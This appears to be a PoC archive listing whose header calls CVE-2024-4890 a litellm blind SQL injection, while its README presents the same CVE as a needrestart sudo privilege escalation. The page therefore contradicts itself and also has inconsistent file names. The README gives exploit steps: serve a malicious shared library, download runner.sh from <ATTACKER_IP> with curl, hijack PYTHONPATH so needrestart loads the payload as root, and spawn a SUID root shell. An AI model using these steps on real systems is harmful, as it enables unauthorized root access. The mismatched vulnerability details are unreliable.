Associated Vulnerability
Title:Blind SQL Injection in berriai/litellm (CVE-2024-4890)Description:A blind SQL injection vulnerability exists in the berriai/litellm application, specifically within the '/team/update' process. The vulnerability arises due to the improper handling of the 'user_id' parameter in the raw SQL query used for deleting users. An attacker can exploit this vulnerability by injecting malicious SQL commands through the 'user_id' parameter, leading to potential unauthorized access to sensitive information such as API keys, user information, and tokens stored in the database. The affected version is 1.27.14.
Description
PoC exploit for CVE-2024-4890: Sudo privilege escalation via neecdrestart (>=3.8). Ethical lab-only. Scripts in Python and C.
Readme
# CVE-2024-4890: needrestart Sudo Privilege Escalation PoC
[](https://nvd.nist.gov/vuln/detail/CVE-2024-4890)
[](https://opensource.org/licenses/MIT)
## Disclaimer
**For lab-only use in controlled environments. Do not exploit on production systems without explicit authorization. This PoC is for educational purposes only. The author is not responsible for any misuse or unauthorized access.**
## Overview
CVE-2024-4890 is a critical vulnerability in `needrestart` (versions >= 3.8) that enables arbitrary code execution with elevated privileges. The issue stems from insecure handling of environment variables and configuration files during process scanning.
Specifically, when run with `sudo`, `needrestart` inspects running Python processes, including their `PYTHONPATH` environment variable. An attacker can hijack this by setting a custom `PYTHONPATH` pointing to a controlled directory (e.g., `/tmp/attacker`). Inside this directory, a malicious module (`__init__.so`) is placed in a fake `importlib` structure. When `needrestart` attempts to import it as root (to check libraries), the payload executes, granting root access.
This PoC demonstrates the exploit via a bait Python process, a malicious shared library (compiled from C), and an automation script.
## Prerequisites
- **Target**: Linux system with `needrestart` >= 3.8 and `sudo` access to it.
- **Tools**: `gcc` (for compilation), `curl`, `python3`.
## Files Structure
Place these in `/tmp/attacker` on the **target machine**.
- `e.py`: Bait Python script (runs in loop, waits for payload success).
- `runner.sh`: Automation script to set up and trigger the bait.
## Exploit Steps
1. **Attacker Machine**: Compile `lib.c` to `__init__.so` and host it:
`gcc -shared -fPIC -o init.so lib.c`
`python3 -m http.server 8000`
**Target Machine** (Victim):
- Create `/tmp/attacker` directory.
- Copy the `main.py`
- Download and make `runner.sh` executable:
```bash
curl http://<ATTACKER_IP>:<PORT>/runner.sh -o /tmp/attacker/runner.sh
chmod +x /tmp/attacker/runner.sh
```
Run the setup in one terminal:
`cd /tmp/attacker && ./runner.sh`
This creates the malicious module, bait script, and starts the hijacked Python process.
3. **Trigger the Scan** (in a new SSH session):
`sudo /usr/sbin/needrestart`
`needrestart` detects the bait process, reads `PYTHONPATH`, and imports the malicious `__init__.so` as root—executing the payload.
4. **Harvest Access** (back in the `runner.sh` terminal):
- The script detects `/tmp/poc` (SUID root shell created by payload) and spawns a root shell:
`sudo /tmp/poc -p`
Clean up: `rm -rf /tmp/attacker /tmp/poc` (and remove sudoers entry if added).
**Success Indicator**: `whoami` shows `root` or `id` shows `uid=0(root)`.
File Snapshot
[4.0K] /data/pocs/c0f46e1dc129b5b4d33965b7922094a53163d495
├── [1.0K] LICENSE
├── [2.8K] README.md
└── [4.0K] scripts
├── [ 769] lib.c
├── [ 19] main.py
└── [1.1K] runner.sh
2 directories, 5 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →